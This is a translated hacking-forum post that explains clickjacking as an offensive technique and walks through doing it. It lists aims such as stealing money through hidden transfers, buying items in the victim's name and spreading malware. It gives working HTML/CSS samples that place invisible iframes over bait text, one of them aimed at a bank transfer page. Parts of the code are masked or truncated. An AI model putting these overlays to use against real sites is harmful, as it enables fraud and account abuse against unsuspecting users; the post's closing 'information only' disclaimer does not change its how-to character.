What is Clickjacking Attack, How To Do It?

Vilge234 · 7 Eki 2020

❧What Is Clickjacking, How To Do It? Slyfer❧

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

Hello, I want to show you what is ''Clickjacking Attack'' is and how to do it. First of all what is ''Clickjacking''? A clickjacking attack is the process of feeding back screen codes to the victim after clicking on a specially placed code set (For example : download free, crack download sites.....etc) while victim is browsing a malicious web page.

For a very simple example, a clickjacking attack on facebook is done as follows :

A visitor is drawn into a malicious page. It doesn't matter how.
There is a link on the site that seems harmless. (Like "get rich now" or, click here, download free..etc").
The malicious page positions <iFrame> with src from facebook.com on this link. In fact the ''Like'' button is just above that link. This is usually done with z-index. The visitor actually clicks the button while trying to click the link and abracadabra, the victim swallows the bait and does what we wanted on Facebook

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

❧ClickJacking Attack Examples❧

Attacker, creates an invisible iFrame on the page and uploads his tool page to that. The malicious page, contains a visual element to convince the user to click. For example it may have a visual element similiar to a video player with a play button in the center. User clicks on the play button, but due to the texture, clicks on a URL element on the tool page.

Attaker, creates a 1 x 1 iFrame that moves with the mouse cursor. Due to it's size and ********, this frame is completely invisible (curser symbol is hidden below it's edge). If the user clicks anywhere he clicks on everything that's uploaded and positioned on this 1 x 1 frame.

Attacker, uses the tool page's parts by cutting them. For example, they create a iFrame which contains a send button from the tool page.

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

Attacker, can abuse clicking piracy security leaks for various goals.

⇝To get followers on social media and after that probably selling the social media account / page for corporate marketing.

⇝To get E-mail or RSS subscribers for the same goal as Social media followers.

⇝Being logged into the user's E-Commerce account and purchasing a product in the name of attacker.

⇝To make the user unknowingly transact money to the Attacker's account.

⇝To make users download malware

)(for example a trojan,worm,backdoor..etc)

Generally is Clickjacking uses are only based on attacking.

Some browsers, allow web sites to drag and drop, thus making it possible to send text via Clickjacking. This means, Clickjacking's CSRF is more effective. Therefore, it is possible to abuse spontaneous XSS security leaks or it's possible to send random content as the targeted user - for example, adding a new administrative user if the victim swallows the bait.

Due to these reasons you have to be very cunning to do the attack. For major attacks, it isn't enough for the victim to click once, sometimes it requires to make several clicks or do drag and drop inside the site.

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

How To Do Clickjacking Attack? Examples

Now I'll show you how to do the clickjacking attack that I prepared on basic level. This way you'll have comprehended it better.

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

Kod:

*********
  #protector {
    height: 100%;
    width: 100%;
    position: absolute;
    left: 0;
    top: 0;
    z-index: 99999999;
  }
</style>

<div id="protector">
  <a href="https://www.turkhackteam.org" target="_blank">Tıkla Kazan Dostum- Slyfer THT</a>
</div>

➥CLICK HERE AND RUN THE CODE - SLYFER

It's a very simple code, it immediatly redirects you to Turk Hack Team site when clicked. To change the site href="https://www.turkhackteam.org" it is enough to change this.

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

Kod:

<div style="position: absolute; left: 10px; top: 10px;">Merhaba, çok şanslısın bizden çatal bıçak takımı kazandın :) Turk Hack Team-Slyfer</div>
<div style="position: absolute; left: 200px; top: 50px;">
  <img src="https://www.linkpicture.com/q/LPic5f5a31535df0f1455795954.jpg" width="250">
</div>
<div style="position: absolute; left: 10px; top: 101px; color: red; font-weight: bold;">>> Tıkla :) <<</div>
<iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://banka hesabı veya link örnektir/Transfer.aspx"></iframe>

ꕥCLICK HERE TO RUN THE CODE

Kod:

*********
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>

<button>Click here!</button>

<div>TURK HACK TEAM</div>

THIS CODE IS QUOTED

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.

Lastly

Clickjacking is an attack type which is completely dependant on your imagination and code knowledge. If you wish you can do more legal things like clicking on advertisements. Or, from the victim's log records, bank account, IP address, l0cation info, browser info to preparing a trap that your imagination can think of. This was all I was going to tell, thanks for reading.
It is completely written with the purpose of information, There is no aim of any encouragement. I hope you enjoy the forum.

Source: https://www.turkhackteam.org/web-se...aldirisi-nedir-nasil-yapilir.html#post9184498
Translator: Vilge234

What is Clickjacking Attack, How To Do It?

Vilge234

Yeni üye

Sosyal medya sayfalarımız